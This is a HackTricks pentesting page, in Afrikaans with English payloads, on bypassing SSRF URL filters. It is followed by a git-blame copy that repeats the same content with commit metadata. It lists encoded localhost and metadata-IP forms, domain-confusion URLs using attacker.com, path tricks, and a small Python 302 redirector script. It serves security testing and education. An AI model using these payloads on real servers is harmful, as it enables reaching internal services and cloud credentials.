hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

# URL Formaat Bypass

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### Lokale gasheer
```bash
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
![](<../../.gitbook/assets/image (776).png>)

Die **Burp-uitbreiding** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implementeer IP-formaat omseilings.

### Domein Parser
```bash
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
http://169.254.1698.254\@attacker.com
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
```

```
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
### Domein Verwarring
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

#Parameter pollution
next={domain}&next=attacker.com
```
### Paaie en Uitbreidings Omseiling

As jy vereis word dat die URL in 'n pad of 'n uitbreiding moet eindig, of 'n pad moet bevat, kan jy een van die volgende omseilings probeer:
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path
```
### Fuzzing

Die hulpmiddel [**recollapse**](https://github.com/0xacb/recollapse) kan variasies genereer vanaf 'n gegewe invoer om te probeer om die gebruikte regex te omseil. Kyk na [**hierdie pos**](https://0xacb.com/2022/11/21/recollapse/) ook vir meer inligting.

### Bypass via redirect

Dit mag moontlik wees dat die bediener **die oorspronklike versoek filter** van 'n SSRF **maar nie** 'n moontlike **redirect** antwoord op daardie versoek nie.\
Byvoorbeeld, 'n bediener wat kwesbaar is vir SSRF via: `url=https://www.google.com/` mag die **url param** filter. Maar as jy 'n [python bediener gebruik om met 'n 302 te antwoord](https://pastebin.com/raw/ywAUhFrv) na die plek waar jy wil omlei, mag jy in staat wees om **gefilterde IP adresse** soos 127.0.0.1 of selfs gefilterde **protokolle** soos gopher te **benader**.\
[Kyk na hierdie verslag.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
```python
#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()

class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
## Verduidelik Tricks

### Blackslash-trick

Die _backslash-trick_ benut 'n verskil tussen die [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) en [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Terwyl RFC3986 'n algemene raamwerk vir URI's is, is WHATWG spesifiek vir web-URL's en word dit deur moderne blaaiers aangeneem. Die sleutelonderskeid lê in die WHATWG-standaard se erkenning van die backslash (`\`) as gelyk aan die voorwaartse skuif (`/`), wat die manier waarop URL's geparseer word, beïnvloed, spesifiek die oorgang van die hostname na die pad in 'n URL.

![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)

### Ander Verwirring

![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)

beeld van [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)

## Verwysings

* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)


{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking tricks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`# URL Formaat Bypass`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Opleiding AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Opleiding GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<summary>Ondersteun HackTricks</summary>`
arte 2024-01-01 17:15:42 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`* Kyk na die [subskripsie planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`### Lokale gasheer`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
fix mess 2022-05-01 12:41:36 +00:00			`# Localhost`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://127.0.0.1:80`
			`http://127.0.0.1:443`
			`http://127.0.0.1:22`
			`http://127.1:80`
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00			`http://127.000000000000000.1`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0`
GitBook: [#3686] No subject 2022-12-19 23:36:02 +00:00			`http:@0/ --> http://localhost/`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0.0.0.0:80`
			`http://localhost:80`
			`http://[::]:80/`
			`http://[::]:25/ SMTP`
			`http://[::]:3128/ Squid`
			`http://[0000::1]:80/`
			`http://[0:0:0:0:0:ffff:127.0.0.1]/thefile`
			`http://①②⑦.⓪.⓪.⓪`

fix mess 2022-05-01 12:41:36 +00:00			`# CDIR bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://127.127.127.127`
			`http://127.0.1.3`
			`http://127.0.0.0`

			`# Dot bypass`
			`127。0。0。1`
			`127%E3%80%820%E3%80%820%E3%80%821`

fix mess 2022-05-01 12:41:36 +00:00			`# Decimal bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://2130706433/ = http://127.0.0.1`
			`http://3232235521/ = http://192.168.0.1`
			`http://3232235777/ = http://192.168.1.1`

fix mess 2022-05-01 12:41:36 +00:00			`# Octal Bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0177.0000.0000.0001`
			`http://00000177.00000000.00000000.00000001`
			`http://017700000001`

fix mess 2022-05-01 12:41:36 +00:00			`# Hexadecimal bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`127.0.0.1 = 0x7f 00 00 01`
			`http://0x7f000001/ = http://127.0.0.1`
			`http://0xc0a80014/ = http://192.168.0.20`
			`0x7f.0x00.0x00.0x01`
			`0x0000007f.0x00000000.0x00000000.0x00000001`

GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00			`# Add 0s bypass`
			`127.000000000000.1`

fix mess 2022-05-01 12:41:36 +00:00			`# You can also mix different encoding formats`
			`# https://www.silisoftware.com/tools/ipconverter.php`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`# Malformed and rare`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`localhost:+11211aaa`
			`localhost:00011211aaaa`
			`http://0/`
			`http://127.1`
			`http://127.0.1`

fix mess 2022-05-01 12:41:36 +00:00			`# DNS to localhost`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`localtest.me = 127.0.0.1`
			`customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1`
			`mail.ebc.apple.com = 127.0.0.6 (localhost)`
			`127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)`
			`www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com`
			`http://customer1.app.localhost.my.company.127.0.0.1.nip.io`
			`http://bugbounty.dod.network = 127.0.0.2 (localhost)`
			`1ynrnhl.xip.io == 169.254.169.254`
			`spoofed.burpcollaborator.net = 127.0.0.1`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`![](<../../.gitbook/assets/image (776).png>)`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:51:04 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`Die Burp-uitbreiding [Burp-Encode-IP](https://github.com/e1abrador/Burp-Encode-IP) implementeer IP-formaat omseilings.`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:18:39 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`### Domein Parser`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
			`https:attacker.com`
			`https:/attacker.com`
			`http:/\/\attacker.com`
			`https:/\attacker.com`
			`//attacker.com`
			`\/\/attacker.com/`
			`/\/attacker.com/`
			`/attacker.com`
			`%0D%0A/attacker.com`
			`#attacker.com`
			`#%20@attacker.com`
			`@attacker.com`
GitBook: [#3723] No subject 2023-01-02 12:00:18 +00:00			`http://169.254.1698.254\@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`attacker%00.com`
			`attacker%E3%80%82com`
			`attacker。com`
			`ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ`
			```

			```
			`① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾`
			`⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗`
			`⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰`
			`⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ`
			`Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ`
			`ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`### Domein Verwarring`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
			`# Try also to change attacker.com for 127.0.0.1 to try to access localhost`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`# Try replacing https by http`
			`# Try URL-encoded characters`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://{domain}@attacker.com`
			`https://{domain}.attacker.com`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://{domain}%6D@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://attacker.com/{domain}`
			`https://attacker.com/?d={domain}`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://attacker.com#{domain}`
			`https://attacker.com@{domain}`
			`https://attacker.com#@{domain}`
			`https://attacker.com%23@{domain}`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://attacker.com%00{domain}`
			`https://attacker.com%0A{domain}`
			`https://attacker.com?{domain}`
			`https://attacker.com///{domain}`
			`https://attacker.com\{domain}/`
			`https://attacker.com;https://{domain}`
			`https://attacker.com\{domain}/`
			`https://attacker.com\.{domain}`
			`https://attacker.com/.{domain}`
			`https://attacker.com\@@{domain}`
			`https://attacker.com:\@@{domain}`
			`https://attacker.com#\@{domain}`
			`https://attacker.com\anything@{domain}/`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`# On each IP position try to put 1 attackers domain and the others the victim domain`
			`http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`

			`#Parameter pollution`
			`next={domain}&next=attacker.com`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`### Paaie en Uitbreidings Omseiling`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`As jy vereis word dat die URL in 'n pad of 'n uitbreiding moet eindig, of 'n pad moet bevat, kan jy een van die volgende omseilings probeer:`
GitBook: [#3109] No subject 2022-04-20 09:04:20 +00:00			```
			`https://metadata/vulerable/path#/expected/path`
			`https://metadata/vulerable/path#.extension`
			`https://metadata/expected/path/..%2f..%2f/vulnerable/path`
			```
GitBook: [#3670] No subject 2022-12-05 11:09:36 +00:00			`### Fuzzing`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`Die hulpmiddel [recollapse](https://github.com/0xacb/recollapse) kan variasies genereer vanaf 'n gegewe invoer om te probeer om die gebruikte regex te omseil. Kyk na [hierdie pos](https://0xacb.com/2022/11/21/recollapse/) ook vir meer inligting.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`### Bypass via redirect`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`Dit mag moontlik wees dat die bediener die oorspronklike versoek filter van 'n SSRF maar nie 'n moontlike redirect antwoord op daardie versoek nie.\`
			Byvoorbeeld, 'n bediener wat kwesbaar is vir SSRF via: `url=https://www.google.com/` mag die url param filter. Maar as jy 'n [python bediener gebruik om met 'n 302 te antwoord](https://pastebin.com/raw/ywAUhFrv) na die plek waar jy wil omlei, mag jy in staat wees om gefilterde IP adresse soos 127.0.0.1 of selfs gefilterde protokolle soos gopher te benader.\
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`[Kyk na hierdie verslag.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```python
			`#!/usr/bin/env python3`

			`#python3 ./redirector.py 8000 http://127.0.0.1/`

			`import sys`
			`from http.server import HTTPServer, BaseHTTPRequestHandler`

			`if len(sys.argv)-1 != 2:`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`print("Usage: {} <port_number> <url>".format(sys.argv[0]))`
			`sys.exit()`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`class Redirect(BaseHTTPRequestHandler):`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`def do_GET(self):`
			`self.send_response(302)`
			`self.send_header('Location', sys.argv[2])`
			`self.end_headers()`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()`
			```
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`## Verduidelik Tricks`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`### Blackslash-trick`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			Die _backslash-trick_ benut 'n verskil tussen die [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) en [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Terwyl RFC3986 'n algemene raamwerk vir URI's is, is WHATWG spesifiek vir web-URL's en word dit deur moderne blaaiers aangeneem. Die sleutelonderskeid lê in die WHATWG-standaard se erkenning van die backslash (`\`) as gelyk aan die voorwaartse skuif (`/`), wat die manier waarop URL's geparseer word, beïnvloed, spesifiek die oorgang van die hostname na die pad in 'n URL.
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:18:39 +00:00			`![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`### Ander Verwirring`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`beeld van [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)`
intruder 2023-09-02 23:48:41 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## Verwysings`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:18:39 +00:00
a 2024-02-06 03:10:27 +00:00			`* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)`
			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:38:35 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`<summary>Ondersteun HackTricks</summary>`
arte 2024-01-01 17:15:42 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`* Kyk na die [subskripsieplanne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`* Deel hacking tricks deur PR's in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:15:11 +00:00			`{% endhint %}`